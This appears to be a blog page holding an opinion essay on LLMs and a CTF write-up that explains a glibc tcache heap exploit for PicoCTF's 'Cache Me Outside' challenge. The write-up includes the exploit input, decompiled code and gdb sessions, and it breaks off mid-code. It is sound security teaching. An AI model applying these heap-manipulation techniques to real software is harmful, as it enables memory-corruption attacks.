27 May 2025
I have a love-hate relationship with Large Language Models (LLMs). I feel like they are bad citizens of the internet and will have bad effects long term. At the same time, I feel like I have to use them to not be left behind.
Why is there this Catch-22 with LLMs? Why do I have such a difficult relationship with LLMs?
The Good
LLMs are, without a doubt, amazing tools. I can ask them very detailed questions, and they will somehow come up with an answer. They do make things easier. They help me write. asideHeck, while I wrote the original version, what you read here was reviewed and improved by an LLM! While coding, it is nice to have a very friendly, but also very junior, pair coder at my fingertips. It is nice to have a kind of “living documentation” that not just tells me how to write a module in Angular, but actually adapts the module directly to my needs.
LLMs are amazing!
The Bad
At the same time, I notice a big problem: I just forget to think. It’s easier to just ask an LLM than to do the work myself. I see this with others too. They start coding with an LLM, but because they never have to fully understand the APIs, they do not understand the bugs. They do not understand why something is not working, or is slow.
I do not want to say this is all bad. A calculator is not bad either. asideAnd I like my calculator, especially since I often make stupid mistakes when doing math by hand. At the same time, I do see the value of having learned how to do the math myself. It allows me to apply these formulas in more places, and I can spot wildly wrong results when I mistype something into the calculator.
There’s real value in knowing how to do these things without the help of tools.
Another issue: LLMs are not as good as we think. Writing a few acceptable paragraphs isn’t actually a hard task. And honestly, that’s mostly what LLMs do. If you think they’re doing more than that, go read a book by a truly good author.
LLMs do not produce maintainable code. Yes, I tried. With different models. But they learn from Stack Overflow, which contains just a few snippets of code. Writing maintainable code is more of an art than a science. I can already imagine that in 5-10 years, I’ll be charging a major premium to clean up AI-generated “slop code.”
How many serious security issues will be introduced by people who just “vibe code”?
It also works best if you already know what to ask for. For example, I cannot create a good image with an LLM. Just look at the image for this post! I can’t explain exactly what is wrong with it, so I don’t know how to ask the model to fix it.
It is the same with code. I can tell an LLM to not store passwords in plaintext and instead use a cryptographically secure hash. But if someone doesn’t know the words “cryptographically secure hash”, how would they know what to ask? Or that there’s a problem at all?
The Ugly
Now, here comes the ugly part. The rest is all fixable with time. But here is the real Catch-22, the real crux of the problem.
LLMs are trained on stolen content. Yes, I know, people argue about whether it really is stealing, but it is! Just look at the craze around the Studio Ghibli-themed images! The companies behind the models admit that their business model would not work if they were not allowed to steal.
This is the “Uber argument”. Uber also claimed that their business model wouldn’t work if they had to employ (and with that, fairly pay) their drivers. I strongly believe such business models just should not exist.
Using an LLM also seems to turn off our brains. There is something magical about having a tool tell you what the odds are. Studies have shown that when an AI tells us something, we just believe it. And even worse, we absorb the biases of whatever model we use! Of course we also absorb the biases of the people around us. But that bias is at least distributed. If we end up with 3-4 AI models in the future (which I think is highly likely, as the network effect helps an AI get better, just as it helped Google Search get better), then 3-4 companies control our thinking.
Even if the companies do not try to be biased, bias can sneak in. A famous example: an AI model produced racist results, so its creators removed “race” as an input. What did the model do? It just ended up using ZIP codes as a proxy for race. asideI know, shocking!
And I wonder: who will train the LLMs in the future? If more and more internet content is made by LLMs, and then LLMs train on that content, the biases will just repeat and grow stronger. The dead internet theory says ‘Hi’.
Will an LLM go and take a walk around a lake with a confidential source, as investigative journalists do today?
And I haven’t even mentioned the environmental cost of training and running these models.
So…
Should we throw the baby out with the bathwater? No. But we, as a society, need to decide what is OK and what isn’t. Where should we use LLMs? And where should LLMs be forbidden, even if that means accepting inefficiencies?
The problem is: The cat is already out of the bag. Even if “we” (as in, the west) decided to stop, other parts of the world with weaker privacy protections would keep going. Should we just leave the playing field to them? Probably not. But we must find the right way to move forward.
Another Catch-22.
Should you be worried about LLMs? This is for you to decide.
Me? I am not. At least not for my livelihood. There will always be a space for people who are willing to go the extra mile, to deeply understand things. But I do worry about what this means for society. And I am not so sure that in the future we will look back and agree that this was a positive development. But we will all use LLMs. Because we have to.
And if everything goes wrong, I’ll just spend my days cleaning up AI-slop code. For a ridiculous daily fee.
11 May 2021
Heap exploits have always been a mystery to me. I am generally not that experienced with binary exploitation, so when a heap exploit came up on the recent PicoCTF competition I decided this is a good moment to take a closer look at heap exploits. This took me down, well, I can’t really call it a rabbit hole. It felt more like falling into a huge sinkhole.
So I guess this is my addition to the heap of failed attempts at explaining how heap exploitation works.
Challenge
The challenge was:
Cache Me Outside
While being super relevant with my meme references, I wrote a program to see how much you understand heap allocations. nc mercury.picoctf.net 31153
It came with three files: a binary, a makefile, as well as a libc file. Additionally, there was a hint pointing to glibc’s tcache.
TLDR
The solution is:
$ echo "-5144\n\x00\n\n" | nc mercury.picoctf.net 31153
Input one has to be -5144, input two \x00. Yes, I need thousands of words to explain how I derived two simple inputs. I did say heap exploitation is convoluted.
Exploring The Binary
First things first, let’s run the binary on the remote server:
$ nc mercury.picoctf.net 31153
You may edit one byte in the program.
Address: AAAAA
Value: t help you: this is a random string.
It allows me to enter an address (here I used AAAAA) and then returns what seems like a partial string (t help you: this is a random string.).
Prepare The Local Binary
A good start is always strings.
$ strings heapedit
[...snip...]
this is H
a randomH
string.H
CongratsH
! Your fH
lag is: H
Sorry! TH
his won'H
t help yH
[...snip...]
It does return a few string fragments (this is H, ag is: H, Sorry! TH, etc.). Otherwise it does not return too much of interest.
Since that didn’t help, run the binary: asideIf you are running a virus now, well… Sorry!
$ ./heapedit
zsh: segmentation fault ./heapedit
That does not work, because the libc version of the binary does not agree with the libc version of the system.
$ ./libc.so.6 # libc of the challenge
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.2) stable release version 2.27.
$ ldd --version # libc of my system
ldd (Debian GLIBC 2.31-9) 2.31
The binary was compiled against 2.27, but locally, I have 2.31 (from ldd). This is most likely why it won’t run. One way to fix it (sometimes, at least) is to use pwninit. It will download a dynamic linker compatible with the expected libc version. Then we can run the tool against this libc library instead of the system library. Put the executable as well as libc.so.6 in the same folder, then run pwninit.
$ pwninit
bin: ./heapedit
libc: ./libc.so.6
fetching linker
setting ./ld-2.27.so executable
This downloads a linker compatible with the libc version of the binary. Now we can run the binary, overriding the library load path with LD_PRELOAD.
$ LD_PRELOAD=./libc.so.6 ./ld-2.27.so ./heapedit
zsh: segmentation fault LD_PRELOAD=./libc.so.6 ./ld-2.27.so ./heapedit
It still crashes! To figure out why, we need to be able to run and debug it. But working with binaries that need LD_PRELOAD set is a bit cumbersome. For example, I would love to just run ltrace on it to get an idea of what is happening. With LD_PRELOAD set, this won’t work, as then ltrace would also be run with a different libc, which, in turn, does not work. Welcome, cyclic dependency hell! However, we can just rewrite the interpreter in the binary. First, let’s check which interpreter it points to right now:
$ file heapedit
heapedit_orig: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6967c296c25feb50c480b4edb5c56c234bb30392, not stripped
It points to /lib64/ld-linux-x86-64.so.2. We can rewrite it with patchelf:
$ patchelf --set-interpreter ./ld-2.27.so ./heapedit
$ file ./heapedit
./heapedit: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./ld-2.27.so, for GNU/Linux 3.2.0, BuildID[sha1]=6967c296c25feb50c480b4edb5c56c234bb30392, not stripped
Now we can run heapedit without LD_PRELOAD.
$ ./heapedit
zsh: segmentation fault ./heapedit
But we still get a segfault! At least now we can run other tools against the binary. For example, ltrace. ltrace, Library Trace, will trace all dynamic library calls. This, together with the similar strace, which traces system calls, is a very easy way to see roughly what an executable does.
$ ltrace ./heapedit
setbuf(0x7fcf63e56760, 0) = <void>
fopen("flag.txt", "r") = 0
fgets( <no return ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
ltrace shows that it calls fopen to open a file called flag.txt, calls fgets (most likely with the file handle from fopen) and segfaults. It is probably safe to assume that flag.txt is required to run heapedit. Luckily, there is an easy fix for that.
$ echo "iamaflag" > flag.txt
$ ./heapedit
You may edit one byte in the program.
Address: AAAA
Value: t help you: this is a random string.
Perfect! The binary finally runs locally. (Thanks to this writeup for the hints on how to get the file running without changing to a completely new VM with the same libc version.)
But, we still are nowhere near to actually solving the challenge. Let’s open the binary in ghidra to see what is actually happening.
Reversing The Binary
Importing the binary into ghidra, running all analyzers and then searching for main gives the following decompiled output: asidePSA: Never trust the decompiler, dummy!
(Note: the raw ghidra output is shown first, followed by a slightly cleaned up version with renamed variables.)
undefined8 main(void)
{
long in_FS_OFFSET;
undefined local_a9;
int local_a8;
int local_a4;
undefined8 *local_a0;
undefined8 *local_98;
FILE *local_90;
undefined8 *local_88;
void *local_80;
undefined8 local_78;
undefined8 local_70;
undefined8 local_68;
undefined local_60;
char local_58 [72];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
setbuf(stdout,(char *)0x0);
local_90 = fopen("flag.txt","r"); // (1)
fgets(local_58,0x40,local_90);
local_78 = 0x2073692073696874; // (2)
local_70 = 0x6d6f646e61722061;
local_68 = 0x2e676e6972747320;
local_60 = 0;
local_a0 = (undefined8 *)0x0;
local_a4 = 0;
while (local_a4 < 7) { // (3)
local_98 = (undefined8 *)malloc(0x80);
if (local_a0 == (undefined8 *)0x0) {
local_a0 = local_98; // (4)
}
*local_98 = 0x73746172676e6f43; // (5)
local_98[1] = 0x662072756f592021;
local_98[2] = 0x203a73692067616c;
*(undefined *)(local_98 + 3) = 0;
strcat((char *)local_98,local_58); // (6)
local_a4 = local_a4 + 1;
}
local_88 = (undefined8 *)malloc(0x80); // (7)
*local_88 = 0x5420217972726f53;
local_88[1] = 0x276e6f7720736968;
local_88[2] = 0x7920706c65682074;
*(undefined4 *)(local_88 + 3) = 0x203a756f;
*(undefined *)((long)local_88 + 0x1c) = 0;
strcat((char *)local_88,(char *)&local_78); // (8)
free(local_98); // (9)
free(local_88);
local_a8 = 0;
local_a9 = 0;
puts("You may edit one byte in the program.");
printf("Address: ");
__isoc99_scanf(&DAT_00400b48,&local_a8); // (10)
printf("Value: ");
__isoc99_scanf(&DAT_00400b53,&local_a9); // (11)
*(undefined *)((long)local_a8 + (long)local_a0) = local_a9;
local_80 = malloc(0x80); // (12)
puts((char *)((long)local_80 + 0x10)); // (13)
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
undefined8 main(void)
{
long in_FS_OFFSET;
char new_byte;
int address;
int i;
undefined *first_malloc_data;
char **flag_data;
FILE *flag_file_ptr;
char **random_data;
char **last_malloc;
char random_string [24];
char flag_ptr [72];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
setbuf(stdout,(char *)0x0);
flag_file_ptr = fopen("flag.txt","r"); // (1)
fgets(flag_ptr,0x40,flag_file_ptr);
random_string._0_8_ = 2338328219631577204; // (2)
random_string._8_8_ = 7885631897793077345;
random_string._16_8_ = 3343762647516738336;
first_malloc_data = (undefined *)0x0;
i = 0;
while (i < 7) { // (3)
flag_data = (char **)malloc(0x80);
if (first_malloc_data == (undefined *)0x0) {
first_malloc_data = (undefined *)flag_data; // (4)
}
*flag_data = (char *)8319381555649605443; // (5)
flag_data[1] = (char *)7359007639828242465;
flag_data[2] = (char *)2322295453215318380;
*(undefined *)(flag_data + 3) = 0;
strcat((char *)flag_data,flag_ptr); // (6)
i = i + 1;
}
random_data = (char **)malloc(0x80); // (7)
*random_data = (char *)6061881903935549267;
random_data[1] = (char *)2841330972353587560;
random_data[2] = (char *)8728099688704122996;
*(undefined4 *)(random_data + 3) = 540702063;
*(undefined *)((long)random_data + 0x1c) = 0;
strcat((char *)random_data,random_string); // (8)
free(flag_data); // (9)
free(random_data);
address = 0;
new_byte = '\0';
puts("You may edit one byte in the program.");
printf("Address: ");
__isoc99_scanf("%d",&address); // (10)
printf("Value: ");
__isoc99_scanf(" %c",&new_byte); // (11)
first_malloc_data[address] = new_byte;
last_malloc = (char **)malloc(0x80); // (12)
puts((char *)(last_malloc + 2));
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
The code first opens flag.txt (1) and stores its contents in the stack variable flag_ptr. Then it prepares a char array (2) with the string “this is a random string.”. It then starts a loop (3) that allocates 7 chunks of size 0x80. Each chunk contains the string (5) “Congrats! Your flag is: ” and the flag (6). It also stores the first chunk in a separate stack variable first_malloc_data (4). Note that the flag_data pointer is overwritten in each iteration of the loop without freeing the allocated chunk first. This is a classic memory leak.
After the loop it allocates the random_data chunk of size 0x80 (7) and fills it with the string “Sorry! This won’t help you: ” and the random string (8). Afterwards, it frees flag_data, the last loop chunk containing the flag (9), then frees random_data. It reads an address from standard input (10) as well as a new byte (11) and writes the new byte to first_malloc_data[address]. It allocates one last chunk, last_malloc, of size 0x80 (12) and prints that chunk as a string (minus the first few bytes) (13). Afterwards it exits.
The bug (or, well, feature) of the code is that we can write one byte anywhere in memory, relative to an address in the heap. The second problem is that the last_malloc chunk gets allocated in (12) and then printed, without zeroing or changing the data. From the output of the program we know that the last_malloc chunk is the same as the last freed chunk, random_data, as it prints the same text as was put into random_data in (7).
If we just could get the allocator to return us the chunk with the flag… But, can we? Yes, we can. But this will now require a bit of knowledge about how the heap works.
The Heap Explained
When running a process, there are different ways to store data in memory. Generally, there is the stack and the heap.
Theoretically, there is a third way, what I like to call the “anywhere in process memory”. There is nothing limiting us from just placing some data at address 0x7f88443322110044, as long as that address is memory mapped. I would not recommend that, however.
A memory map can be dumped with gdb:
gef➤ info proc mappings
process 1203
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x401000 0x1000 0x0 /home/picoctf/cache-me-outside/heapedit
0x600000 0x601000 0x1000 0x0 /home/picoctf/cache-me-outside/heapedit
0x601000 0x602000 0x1000 0x1000 /home/picoctf/cache-me-outside/heapedit
0x602000 0x623000 0x21000 0x0 [heap]
0x7ffff7ded000 0x7ffff7e12000 0x25000 0x0 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7e12000 0x7ffff7f5d000 0x14b000 0x25000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7f5d000 0x7ffff7fa7000 0x4a000 0x170000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7fa7000 0x7ffff7fa8000 0x1000 0x1ba000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7fa8000 0x7ffff7fab000 0x3000 0x1ba000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7fab000 0x7ffff7fae000 0x3000 0x1bd000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7fae000 0x7ffff7fb4000 0x6000 0x0
0x7ffff7fcc000 0x7ffff7fd0000 0x4000 0x0 [vvar]
0x7ffff7fd0000 0x7ffff7fd2000 0x2000 0x0 [vdso]
0x7ffff7fd2000 0x7ffff7fd3000 0x1000 0x0 /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x7ffff7fd3000 0x7ffff7ff3000 0x20000 0x1000 /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x7ffff7ff3000 0x7ffff7ffb000 0x8000 0x21000 /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x7ffff7ffc000 0x7ffff7ffd000 0x1000 0x29000 /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x7ffff7ffd000 0x7ffff7ffe000 0x1000 0x2a000 /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x7ffff7ffe000 0x7ffff7fff000 0x1000 0x0
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
Here we can see that the [stack] is mapped from 0x7ffffffde000 to 0x7ffffffff000 and the heap from 0x602000 to 0x623000. You can also find this information for a running process without GDB. Exit gdb and run heapedit again. Then, in a new terminal, get the memory map directly from the file system (1223 is the PID of heapedit):
$ cat /proc/1223/maps
00400000-00401000 r-xp 00000000 00:2a 2858 /home/picoctf/cache-me-outside/heapedit
00600000-00601000 r--p 00000000 00:2a 2858 /home/picoctf/cache-me-outside/heapedit
00601000-00602000 rw-p 00001000 00:2a 2858 /home/picoctf/cache-me-outside/heapedit
00a8a000-00aab000 rw-p 00000000 00:00 0 [heap]
7fa50edde000-7fa50ee03000 r--p 00000000 08:01 4458632 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ee03000-7fa50ef4e000 r-xp 00025000 08:01 4458632 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef4e000-7fa50ef98000 r--p 00170000 08:01 4458632 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef98000-7fa50ef99000 ---p 001ba000 08:01 4458632 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef99000-7fa50ef9c000 r--p 001ba000 08:01 4458632 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef9c000-7fa50ef9f000 rw-p 001bd000 08:01 4458632 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef9f000-7fa50efa5000 rw-p 00000000 00:00 0
7fa50efbd000-7fa50efbe000 r--p 00000000 08:01 4458628 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efbe000-7fa50efde000 r-xp 00001000 08:01 4458628 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efde000-7fa50efe6000 r--p 00021000 08:01 4458628 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efe7000-7fa50efe8000 r--p 00029000 08:01 4458628 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efe8000-7fa50efe9000 rw-p 0002a000 08:01 4458628 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efe9000-7fa50efea000 rw-p 00000000 00:00 0
7fff22800000-7fff22821000 rw-p 00000000 00:00 0 [stack]
7fff22920000-7fff22924000 r--p 00000000 00:00 0 [vvar]
7fff22924000-7fff22926000 r-xp 00000000 00:00 0 [vdso]
The [heap] is mapped from 0x00a8a000 to 0x00aab000. Wasn’t it different before? Yes. This is because ASLR (Address Space Layout Randomization) is enabled on my system. Every time a process starts, the positions of the heap and stack are randomized.
The stack is used automatically by the compiler for parameters and local variables. Usually, you do not have to know about it at all, except when writing assembly directly. But it can only store data whose size is known at compile time. If you need variable-sized data, you need a heap.
The heap is a separate memory region that is used by the allocator to store variable-sized data (a string entered by the user, a packet received from the network), aka chunks. The management of the heap is quite complicated, as it needs to be as fast as possible. Run an executable in gdb, set a breakpoint on malloc and, well, your process will be paused. A lot!
The high performance is achieved using different techniques. When allocating a chunk of memory with malloc, the allocator reserves some memory in the [heap], returns a pointer to this address, and marks the chunk as used. When the chunk is no longer required, the program calls free on that chunk. asideYou do call free on all your mallocs. Right? Right??? The allocator will then put that chunk into the pool of free resources. Note that the allocator is not a hard-coded dependency and can be changed. For Linux programs, the glibc allocator is most often used.
How does the allocator manage these chunks? Now, here is where it gets complicated. To speed up the process of allocating new memory, the allocator does not always search through all of the heap to find free space. Instead, it tries to reuse as many chunks as possible. Many programs tend to allocate and free chunks of similar sizes in rapid succession, for example when allocating a new object in each iteration of a loop. Hence the allocator puts freed chunks into so-called bins (think recycling bins) for easy retrieval in case a similarly sized chunk is requested again soon.
The glibc allocator keeps many different bins of different shapes and sizes for performance optimization. It has small bins, large bins, unsorted bins, fast bins and tcache bins. asideYes, it only took me, like, 2000 words to finally get to the tcache! I will not go into detail here about all the different bins and strategies. If you are interested, I highly recommend the blog series “Understanding the Glibc Heap Implementation” by Azeria. Most of my understanding comes from these blog posts!
The interesting thing to note for this exploit is that when a chunk is freed, it is added to the tcache. The tcache is the “thread cache”, where freed chunks go to be recycled if the same thread allocates again. At least, at first, and only seven chunks per bin, and only if the requested size matches, but let’s not get into too much detail. For this exploit, the simple version holds: the freed chunk is added to a tcache list of memory chunks that will be reused by the allocator. This is why, at the end of the program, we get the last freed chunk back.
The following animation shows how elements are added to and removed from the tcache.
// Program Start
◄─── tcache bin
// Program Start
free(flag_data);
┌──────────────────┐
│ flag_data │◄─── tcache bin
└──────────────────┘
// Program Start
free(flag_data);
free(random_data);
┌──────────────────┐
│ flag_data │
└──────────────────┘
▲
│
┌────────┴─────────┐
│ random_data │◄─── tcache bin
└──────────────────┘
// Program Start
free(flag_data);
free(random_data);
last_malloc = malloc(0x80);
┌──────────────────┐
│ flag_data │◄─── tcache bin
└──────────────────┘
┌──────────────────┐
│ random_data │◄─── last_malloc
└──────────────────┘
The animation shows the tcache from the program start and after each free. The first 7 mallocs from the loop are not visible in the tcache, as these are new allocations and are not in a recycling bin yet. asideYou do not buy bottles just to put them into a recycling bin, do you? Then the two freed chunks are put in the tcache. The tcache bin pointer always points to the last freed chunk. The last malloc does not allocate a new chunk, but instead reuses the random_data chunk from the tcache bin. The tcache bin pointer then points to flag_data, as this is now the next free chunk in the tcache.
Another way to take a look at the tcache is to use gef to dump information about the heap. Let’s start the program again with gdb and look at the tcache.
gef➤ heap bin tcache
──────── Tcachebins for arena 0x7ffff7dcfc40 ──────
At the start it is, unsurprisingly, empty. Let’s set two breakpoints just after the calls to free so we can inspect the tcache. First, disassemble main in gdb:
gef➤ disas main
Dump of assembler code for function main:
0x0000000000400807 <+0>: push rbp
0x0000000000400808 <+1>: mov rbp,rsp
0x000000000040080b <+4>: sub rsp,0xc0
0x0000000000400812 <+11>: mov DWORD PTR [rbp-0xb4],edi
0x0000000000400818 <+17>: mov QWORD PTR [rbp-0xc0],rsi
0x000000000040081f <+24>: mov rax,QWORD PTR fs:0x28
0x0000000000400828 <+33>: mov QWORD PTR [rbp-0x8],rax
0x000000000040082c <+37>: xor eax,eax
0x000000000040082e <+39>: mov rax,QWORD PTR [rip+0x200843] # 0x601078 <stdout@@GLIBC_2.2.5>
0x0000000000400835 <+46>: mov esi,0x0
0x000000000040083a <+51>: mov rdi,rax
0x000000000040083d <+54>: call 0x4006b0 <setbuf@plt>
0x0000000000400842 <+59>: lea rsi,[rip+0x2bf] # 0x400b08
0x0000000000400849 <+66>: lea rdi,[rip+0x2ba] # 0x400b0a
0x0000000000400850 <+73>: call 0x4006f0 <fopen@plt>
0x0000000000400855 <+78>: mov QWORD PTR [rbp-0x88],rax
0x000000000040085c <+85>: mov rdx,QWORD PTR [rbp-0x88]
0x0000000000400863 <+92>: lea rax,[rbp-0x50]
0x0000000000400867 <+96>: mov esi,0x40
0x000000000040086c <+101>: mov rdi,rax
0x000000000040086f <+104>: call 0x4006d0 <fgets@plt>
0x0000000000400874 <+109>: movabs rax,0x2073692073696874
0x000000000040087e <+119>: movabs rdx,0x6d6f646e61722061
0x0000000000400888 <+129>: mov QWORD PTR [rbp-0x70],rax
0x000000000040088c <+133>: mov QWORD PTR [rbp-0x68],rdx
0x0000000000400890 <+137>: movabs rax,0x2e676e6972747320
0x000000000040089a <+147>: mov QWORD PTR [rbp-0x60],rax
0x000000000040089e <+151>: mov BYTE PTR [rbp-0x58],0x0
0x00000000004008a2 <+155>: mov QWORD PTR [rbp-0x98],0x0
0x00000000004008ad <+166>: mov DWORD PTR [rbp-0x9c],0x0
0x00000000004008b7 <+176>: jmp 0x400933 <main+300>
0x00000000004008b9 <+178>: mov edi,0x80
0x00000000004008be <+183>: call 0x4006e0 <malloc@plt>
0x00000000004008c3 <+188>: mov QWORD PTR [rbp-0x90],rax
0x00000000004008ca <+195>: cmp QWORD PTR [rbp-0x98],0x0
0x00000000004008d2 <+203>: jne 0x4008e2 <main+219>
0x00000000004008d4 <+205>: mov rax,QWORD PTR [rbp-0x90]
0x00000000004008db <+212>: mov QWORD PTR [rbp-0x98],rax
0x00000000004008e2 <+219>: mov rax,QWORD PTR [rbp-0x90]
0x00000000004008e9 <+226>: movabs rsi,0x73746172676e6f43
0x00000000004008f3 <+236>: movabs rdi,0x662072756f592021
0x00000000004008fd <+246>: mov QWORD PTR [rax],rsi
0x0000000000400900 <+249>: mov QWORD PTR [rax+0x8],rdi
0x0000000000400904 <+253>: movabs rcx,0x203a73692067616c
0x000000000040090e <+263>: mov QWORD PTR [rax+0x10],rcx
0x0000000000400912 <+267>: mov BYTE PTR [rax+0x18],0x0
0x0000000000400916 <+271>: lea rdx,[rbp-0x50]
0x000000000040091a <+275>: mov rax,QWORD PTR [rbp-0x90]
0x0000000000400921 <+282>: mov rsi,rdx
0x0000000000400924 <+285>: mov rdi,rax
0x0000000000400927 <+288>: call 0x400710 <strcat@plt>
0x000000000040092c <+293>: add DWORD PTR [rbp-0x9c],0x1
0x0000000000400933 <+300>: cmp DWORD PTR [rbp-0x9c],0x6
0x000000000040093a <+307>: jle 0x4008b9 <main+178>
0x0000000000400940 <+313>: mov edi,0x80
0x0000000000400945 <+318>: call 0x4006e0 <malloc@plt>
0x000000000040094a <+323>: mov QWORD PTR [rbp-0x80],rax
0x000000000040094e <+327>: mov rax,QWORD PTR [rbp-0x80]
0x0000000000400952 <+331>: movabs rsi,0x5420217972726f53
0x000000000040095c <+341>: movabs rdi,0x276e6f7720736968
0x0000000000400966 <+351>: mov QWORD PTR [rax],rsi
0x0000000000400969 <+354>: mov QWORD PTR [rax+0x8],rdi
0x000000000040096d <+358>: movabs rcx,0x7920706c65682074
0x0000000000400977 <+368>: mov QWORD PTR [rax+0x10],rcx
0x000000000040097b <+372>: mov DWORD PTR [rax+0x18],0x203a756f
0x0000000000400982 <+379>: mov BYTE PTR [rax+0x1c],0x0
0x0000000000400986 <+383>: lea rdx,[rbp-0x70]
0x000000000040098a <+387>: mov rax,QWORD PTR [rbp-0x80]
0x000000000040098e <+391>: mov rsi,rdx
0x0000000000400991 <+394>: mov rdi,rax
0x0000000000400994 <+397>: call 0x400710 <strcat@plt>
0x0000000000400999 <+402>: mov rax,QWORD PTR [rbp-0x90]
0x00000000004009a0 <+409>: mov rdi,rax
0x00000000004009a3 <+412>: call 0x400680 <free@plt>
0x00000000004009a8 <+417>: mov rax,QWORD PTR [rbp-0x80]
0x00000000004009ac <+421>: mov rdi,rax
0x00000000004009af <+424>: call 0x400680 <free@plt>
0x00000000004009b4 <+429>: mov DWORD PTR [rbp-0xa0],0x0
0x00000000004009be <+439>: mov BYTE PTR [rbp-0xa1],0x0
0x00000000004009c5 <+446>: lea rdi,[rip+0x14c] # 0x400b18
0x00000000004009cc <+453>: call 0x400690 <puts@plt>
0x00000000004009d1 <+458>: lea rdi,[rip+0x166] # 0x400b3e
0x00000000004009d8 <+465>: mov eax,0x0
0x00000000004009dd <+470>: call 0x4006c0 <printf@plt>
0x00000000004009e2 <+475>: lea rax,[rbp-0xa0]
0x00000000004009e9 <+482>: mov rsi,rax
0x00000000004009ec <+485>: lea rdi,[rip+0x155] # 0x400b48
0x00000000004009f3 <+492>: mov eax,0x0
0x00000000004009f8 <+497>: call 0x400700 <__isoc99_scanf@plt>
0x00000000004009fd <+502>: lea rdi,[rip+0x147] # 0x400b4b
0x0000000000400a04 <+509>: mov eax,0x0
0x0000000000400a09 <+514>: call 0x4006c0 <printf@plt>
0x0000000000400a0e <+519>: lea rax,[rbp-0xa1]
0x0000000000400a15 <+526>: mov rsi,rax
0x0000000000400a18 <+529>: lea rdi,[rip+0x134] # 0x400b53
0x0000000000400a1f <+536>: mov eax,0x0
0x0000000000400a24 <+541>: call 0x400700 <__isoc99_scanf@plt>
0x0000000000400a29 <+546>: mov eax,DWORD PTR [rbp-0xa0]
0x0000000000400a2f <+552>: movsxd rdx,eax
0x0000000000400a32 <+555>: mov rax,QWORD PTR [rbp-0x98]
0x0000000000400a39 <+562>: add rdx,rax
0x0000000000400a3c <+565>: movzx eax,BYTE PTR [rbp-0xa1]
0x0000000000400a43 <+572>: mov BYTE PTR [rdx],al
0x0000000000400a45 <+574>: mov edi,0x80
0x0000000000400a4a <+579>: call 0x4006e0 <malloc@plt>
0x0000000000400a4f <+584>: mov QWORD PTR [rbp-0x78],rax
0x0000000000400a53 <+588>: mov rax,QWORD PTR [rbp-0x78]
0x0000000000400a57 <+592>: add rax,0x10
0x0000000000400a5b <+596>: mov rdi,rax
0x0000000000400a5e <+599>: call 0x400690 <puts@plt>
0x0000000000400a63 <+604>: mov eax,0x0
0x0000000000400a68 <+609>: mov rcx,QWORD PTR [rbp-0x8]
0x0000000000400a6c <+613>: xor rcx,QWORD PTR fs:0x28
0x0000000000400a75 <+622>: je 0x400a7c <main+629>
0x0000000000400a77 <+624>: call 0x4006a0 <__stack_chk_fail@plt>
0x0000000000400a7c <+629>: leave
0x0000000000400a7d <+630>: ret
Then set two breakpoints just after the two free calls and continue the debugger.
gef➤ b *main+417
Breakpoint 4 at 0x4009a8
gef➤ b *main+429
Breakpoint 3 at 0x4009b4
gef➤ c
We can now inspect the tcache after the first free was hit.
gef➤ heap bin tcache
─────── Tcachebins for arena 0x7ffff7dcfc40 ───────
Tcachebins[idx=7, size=0x90] count=1 ← Chunk(addr=0x603800, size=0x90, flags=PREV_INUSE)
There is one chunk at address 0x603800 in the tcache. Continue again so the second free is called, then inspect the tcache again.
gef➤ c
gef➤ heap bin tcache
─────── Tcachebins for arena 0x7ffff7dcfc40 ───────
Tcachebins[idx=7, size=0x90] count=2 ← Chunk(addr=0x603890, size=0x90, flags=PREV_INUSE) ← Chunk(addr=0x603800, size=0x90, flags=PREV_INUSE)
As expected, there are now two chunks in the tcache: the new one at address 0x603890 and the chunk from before at 0x603800.
We can also inspect the two chunks:
gef➤ x/4xg 0x603800
0x603800: 0x0000000000000000 0x662072756f592021
0x603810: 0x203a73692067616c 0x67616c66616d6169
gef➤ x/4xg 0x603890
0x603890: 0x0000000000603800 0x276e6f7720736968
0x6038a0: 0x7920706c65682074 0x73696874203a756f
After the first 8 bytes, the characters from the flag and the random string are still there. The first 8 bytes were overwritten by the allocator when the chunk was freed; the allocator uses them to store the pointer to the previous chunk in the tcache. The first chunk contains a null pointer, the second chunk a pointer to the first. We now know that the tcache is implemented as a stack.
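This last-in, first-out behavior can be sketched with a toy model (this is only an illustration of the observed behavior, not glibc's actual implementation):

```ruby
# Toy model of a single tcache bin: free pushes a chunk address,
# malloc pops the most recently freed one (LIFO, like a stack).
class TcacheBin
  def initialize
    @chunks = []
  end

  def free(addr)
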